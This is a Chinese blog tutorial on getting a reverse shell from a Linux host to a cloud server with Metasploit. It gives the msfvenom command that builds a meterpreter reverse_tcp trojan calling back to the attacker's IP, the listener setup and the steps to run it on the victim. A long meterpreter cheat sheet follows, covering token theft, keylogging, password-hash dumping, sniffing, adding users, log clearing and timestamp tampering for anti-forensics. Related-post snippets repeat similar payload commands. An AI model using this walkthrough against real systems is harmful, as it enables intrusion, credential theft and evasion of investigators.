云服务器msf跨域反弹shell

已于 2022-03-29 20:38:17 修改
阅读量5.9k 收藏 10
点赞数 12
文章标签: ubuntu web安全 系统安全
于 2022-03-29 20:37:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iuyoo/article/details/123830994
版权

环境部署

服务器建议使用Ubuntu 16的。然后再在服务器上安装msf。如果是使用服务器记得在控制台将使用的端口开放,否则可能会监听不到会话。

生成木马

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=(公网ip) LPORT=(开放的端口) -f elf > mshell.elf

在/root目录下生成一个mshell.elf木马文件,此文件为linux系统木马

利用msf攻击

使用xftp将生成的木马上传进被攻击机内,这里放入被攻击机/root目录下:

安装了msf的服务器输入msfconsole启动msf

输入use exploit/multi/handler 使用监听模块

set payload linux/x64/meterpreter/reverse_tcp #使用和木马相同的payload

输入set lhost 0.0.0.0 设置攻击者ip,这里直接0.0.0.0就行

输入set lport 666 设置攻击者监听ip,与木马绑定的一致666 

最后show options 看一下设置有没成功

最后直接run进行监听

 

被攻击机打开上传的木马,如果无法执行给予文件木马文件执行权限即可!chmod +x mshell.elf

 

打开木马,监听到对话,成功反弹到木马!

 

 get一下uid,进行提权操作

 msf常见操作指令:

命令: show exploit 列出metasploit框架中的所有渗透攻击模块。
命令:show payloads列出metasploit框架中的所有攻击载荷。
命令:show auxiliary列出metasploit框架中的所有辅助攻击载荷。
命令:search name查找metasploit框架中所有的渗透攻击和其他模块。
命令:info展示出制定渗透攻击或模块的相关信息。
命令:use name装载一个渗透攻击或模块。
命令:LHOST你本地可以让目标主机连接的IP地址,通常当目标主机不在同一个局域网内时,就需要是一个公共IP地址,特别为反弹式shell使用。
命令:RHOST远程主机或是目标主机。
命令:set function设置特定的配置参数(EG:设置本地或远程主机参数)。
命令:setg function以全局方式设置特定的配置参数(EG:设置本地或远程主机参数)。
命令:show options列出某个渗透攻击或模块中所有的配置参数。
命令:show targets列出渗透攻击所有支持的目标平台。
命令:set target num指定你所知道的目标的操作系统以及补丁版本类型。
命令:set payload name指定想要使用的攻击载荷。
命令:show advanced列出所有高级配置选项。
命令:set autorunscript migrate -f.在渗透攻击完成后,将自动迁移到另一个进程。
命令:check检测目标是否选定渗透攻击存在相应的安全漏洞。
命令:exploit执行渗透攻击或模块来攻击目标。
命令:exploit -j在计划任务下进行渗透攻击(攻击将在后台进行)。
命令:exploit -z渗透攻击完成后不与回话进行交互

help

打开meterpreter使用帮助。

run scriptname

运行meterpreter脚本,在scripts/meterpreter目录下可查看到所有脚本名。

sysinfo

列出受控主机的系统信息。

ls

列出目标主机的文件和文件夹信息。

use priv

加载特权提升扩展模块,来扩展metasploit库。

ps

显示所有运行的进程以及相关联的用户账户。

migrate PID

迁移到一个指定的进程ID(PID号可通过ps命令从主机上获得)。

use incognito

加载incognito功能(用来盗窃目标主机的令牌或假冒用户)

list_tokens -u

列出目标主机用户的可用令牌。

list_tokens -g

列出目标主机用户组的可用令牌。

impersonate_token DOMAIN_NAME\USERNAME

假冒目标主机上的可用令牌。

steal_token PID

盗窃给定进程的可用令牌并进行令牌假冒。

drop_token

停止假冒当前令牌。

getsystem

通过各种攻击向量来提升系统用户权限。

execute -f cmd.exe -i

执行cmd.exe命令并进行交互。

execute -f cmd.exe -i -t

以所有可用令牌来执行cmd命令并隐藏该进程。

rev2self

回到控制目标主机的初始用户账户下。

reg command

在目标主机注册表中进行交互,创建,删除,查询等操作。

setdesktop number

切换到另一个用户界面(该功能基于那些用户已登录)。

screenshot

对目标主机的屏幕进行截图。

upload file

向目标主机上传文件。

download file

从目标主机下载文件。

keyscan_start

针对远程目标主机开启键盘记录功能。

keyscan_dump

存储目标主机上捕获的键盘记录。

keyscan_stop

停止针对目标主机的键盘记录。

getprivs

尽可能多的获取目标主机上的特权。

uictl enable keyboard/mouse

接管目标主机的键盘和鼠标。

background

将你当前的metasploit shell转为后台执行。

hashdump

导出目标主机中的口令哈希值。

use sniffer

加载嗅探模式。

sniffer_interfaces

列出目标主机所有开放的网络端口。

sniffer_dump interfaceID pcapname

在目标主机上启动嗅探。

sniffer_start interfaceID packet-buffer

在目标主机上针对特定范围的数据包缓冲区启动嗅探。

sniffer_stats interfaceID

获取正在实施嗅探网络接口的统计数据。

sniffer_stop interfaceID

停止嗅探。

add_user username password -h ip

在远程目标主机上添加一个用户。

clearev

清楚目标主机上的日志记录。

timestomp

修改文件属性,例如修改文件的创建时间(反取证调查)。

reboot

重启目标主机。

iuyoo
关注
  • 12
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
09-06 2429
Cobalt Strike和Msf(Metasploit)之间的相互派生shell。完整的记录了Windows系统被控主机的cs与msf互相反弹shell。Linux系统被控主机的反弹shell给cs和cs上的Linux主机反弹shellmsf
反弹Shell的方式和详解
热门推荐
Kevin's Blog
06-18 1万+
文章目录一、介绍1.1 含义1.2 目的二、反弹方式2.1 Bash反弹shell2.1.1 适用对象2.1.2 操作方法2.1.3 命令原理 声明:以下的反弹shell的介绍只适用于学习和授权情况下的操作,请勿用于非法环境! 一、介绍 1.1 含义   攻击者所在机器连接目标机器为正向连接(如:远程桌面、ssh等),反向连接弹shell反弹shell为攻击者为服务端,受害者主机主动连接攻击者的服务端程序) 1.2 目的 攻击了一台主机需要在自己的机器上交互式地执行目标机器中的cmd/bash命令
【小白学习记】记一次msf反弹shell小错误
最新发布
BeCareful0的博客
06-07 319
使用MSF生成后门程序并反弹Shell,攻击机IP和端口设置后,通过msfvenom命令生成后门程序。上传至目标机并运行后,攻击机通过设置监听模块来接收连接。但运行后门程序后,攻击机未监听到任何动静。经排查,发现问题出在攻击机防火墙上。解决方法为关闭防火墙或添加入站规则。在此案例中,选择关闭防火墙后成功监听到目标机连接。请注意,使用这些技术需确保合法合规,并仅供教育和研究目的使用。
MSF反弹shell原理
weixin_47063945的博客
11-09 243
介绍了MSF反弹shell的原理
阿里msf配合冰蝎反弹shell不成功
weixin_43896364的博客
07-12 1316
前言:自己使用冰蝎配合msf遇到的一个小问题,记录一下,希望能够帮助到同样卡在这的hxd。 前提:确保使用冰蝎成功连接上了webshell并且可以执行命令,怎么点击“给我连”都只是左下角出现“反弹成功。”字样而服务器msf上却并没有监听成功。 假设你使用msf监听的是5566端口,那么只需要在阿里控制台添加一条安全规则即可: 这样再连就能连上了。 ...
利用msfvenom生成木马文件反弹shell
dreamthe的博客
11-19 4327
1.安装靶机和攻击机 首先自己是在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,我选择的win 7 这里记得在安装虚拟机的时候选择桥接模式,这样你的虚拟机和物理机或者其他虚拟机都是一个网段的。 kali的下载地址Get Kali | Kali Linux: 在虚拟机里面直接选择打开就可以了。 攻击机 kali ip是192.168.3.138 靶机 win server 2008 R2 ip是192.168.3.147 ...
iis 6.0 CVE-2017-7269 Msf 反弹shell
01-23
iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
msfvenom获取shell
01-03
仅用于测试 msfvenom各平台生成木马大全: windows: msfvenom -a x86 –platform Windows -p ...msfvenom -a x86 –platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.ma
E019-渗透测试常用工具-使用cobaltstrike接口来传递MSF中的shell.pdf
12-02
本课程聚焦于利用Cobalt Strike工具通过其接口传递Metasploit(MSF)中的shell。Cobalt Strike是一款高级的红队工具,广泛用于模拟攻击者的行为,而Metasploit则是一个开源的渗透测试框架,提供了大量的exploit和...
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
linux系统安装msf的过程详解
09-14
在Linux系统中安装Metasploit Framework(MSF)是一个重要的步骤,对于网络安全研究者和渗透测试人员来说,这是必备的工具。以下是一个详尽的安装教程,特别针对阿里Linux系统。 首先,确保你的系统已经更新到...
网络安全之Metasploit使用
qq_52074678的博客
05-05 3343
1.Metasploit-介绍 Mltasploit框架使Metasploit具有良好的可扩展性,它的控制接口负责发现漏洞,攻击漏洞,提交漏洞,然后通过一些接口加入攻击后处理工具和报表工具。Metaspolit框架可以从一个漏洞扫描程序导入数据,使用关于有洞主机的详细信息来发现可攻击漏洞,然后使用有效载荷对系统发起攻击,有效载荷在发现漏洞之后开发一种可行的攻击方法。其用于提取本地系统密码,安装其他软件或控制硬件的模块,这些功能很像以前的BO2K等工具所具备的功能。 2.Ubuntu安装msf 环境准备
反弹shell原理与实现
悦分享
08-02 3313
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。...
服务器+nps+msf反弹shell小技巧
qq_45414878的博客
02-04 1505
vps+nps+msf反弹shell小技巧环境:vpsnps配置msf1配置msf2配置 有时候我们在做实验或者真实环境测试的时候存在漏洞的服务器在外网,而我们的攻击机kali在内网,在需要msf接收shell的时候不知道该怎么接收,也接收不了(外网ip->内网ip,是不可能找得到的)。此时我们就需要一个vps(有外网IP的主机)再安装一个nps(内网穿透的软件,github上面有,安装教程也在github上面,安装完毕后nps的目录在/etc/nps)。然后具体操作如下 环境: vps:123.5
利用msf在windows下反弹shell
Jiajiajiang_的博客
08-08 7095
靶机地址:10.0.3.146 攻击者地址:10.0.3.120 思路:生成一个shell,让靶机下载下来并执行。方法一是利用ftp下载,方法二是利用可信证书下载http网站的内容。 通过命令执行可以知道靶机是windows2003,32位的。(命令执行systeminfo) 首先利用kali生成一个shell, 命令:msfvenom -p windows/meterpreter...
Metasploit设置LHOST参数技巧
大学霸__IT达人
03-24 6941
Metasploit设置LHOST参数技巧 当用户使用Metasploit框架中的模块时,经常需要配置LHOST参数。其中,LHOST参数用来指定本地主机IP地址。由于IP地址不容易记忆,而且输入也不方便。此时,用户可以使用接口名来代替,如setLHOSTeth0。当用户指定接口名后,将自动使用eth0接口的IP地址。 ...
MSF常用命令
L_lemo004的博客
10-20 2586
Msf是kali下的这款强劲的专用工具,开源系统的网络安全问题测试工具前渗入后渗入环节都用获得,只有還是后渗入环节用的多。 Msf用途大概就是说exploit进攻,cve进攻,远程控制木马病毒进攻运用。 Msfconsole 开启msf Msfconsole -h 协助选择项 Banner 用以查询metasploit的版本信息,运用控制模块总数、payload总数 控制模块详细介绍: Exploits 渗入进攻控制模块 主要用于进攻方式 Auxiliary 輔助控制模块 主要用于信息内容搜集 Payloa
我猜你也在找内网渗透,这篇难道还不够你嚼烂?
kali_Ma的博客
07-06 487
内网渗透前言1.实验简介网络拓扑图2.环境搭建第一层网络第二层网络第三层网络最后第一台Linux第二台Linux3.实验过程第一层靶机蚁剑连接进一步做内网渗透,上传msf后门生成一个名为mshell.elf的msf后门文件蚁剑把后门文件上传到Linux靶机返回msf 开启监听Kail接受到MSF会话添加路由使用MSF建立socks代理第二层网络第三层网络添加路由Win10远程桌面连接登陆成功 前言 近年来,攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜,攻击者在经常会企业的内网进行横向渗透,令防守方防不胜
一个实验了解多层内网渗透
Jeeseen123的博客
11-03 1593
原创:锦行安全平台部zy 近年来,攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜,攻击者在经常会企业的内网进行横向渗透,令防守方防不胜防。因此,我们应该严格控制好网络区之间的访问规则,加大攻击横向渗透的阻力。本文由锦行科技的安全研究团队提供,旨在通过实验演示进一步了解攻击者是如何在多层内网进行的渗透。 一、实验简介 网络拓扑图 渗透机:win10+kali 第一层靶机 (外网web服务器): Linux 第二场靶机 (内网web服务器): Linux 第三层靶机 (内网办公机) : win7 用三层
msf生成反弹shell
08-28
你可以使用Metasploit Framework (MSF)来生成一个反弹shell。这里有一个示例,展示如何使用MSF生成一个反弹到攻击者机器的shell: 1. 首先,启动Metasploit Framework控制台。在终端中输入 `msfconsole` 并按下回车。 2. 输入以下命令来查找可用的Payload: ``` search payload/windows/shell_reverse_tcp ``` 3. 选择一个适合的Payload并记下其Payload编号。 4. 设置Payload选项。使用 `use` 命令加上Payload编号,例如: ``` use windows/shell_reverse_tcp ``` 5. 设置Payload的必要参数。使用 `set` 命令加上参数名和值来设置,例如: ``` set LHOST <攻击者机器的IP地址> set LPORT <监听端口号> ``` 6. 启动监听器。使用 `exploit` 命令来启动监听器并等待目标主机连接。 ``` exploit ``` 7. 当目标主机与你的监听器连接时,你将收到一个反弹到攻击者机器的shell。 请注意,上述步骤只是简单介绍了如何使用MSF生成反弹shell,实际操作需要更多的细节和配置。确保你在合法的环境中进行这些操作,并遵循所有法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值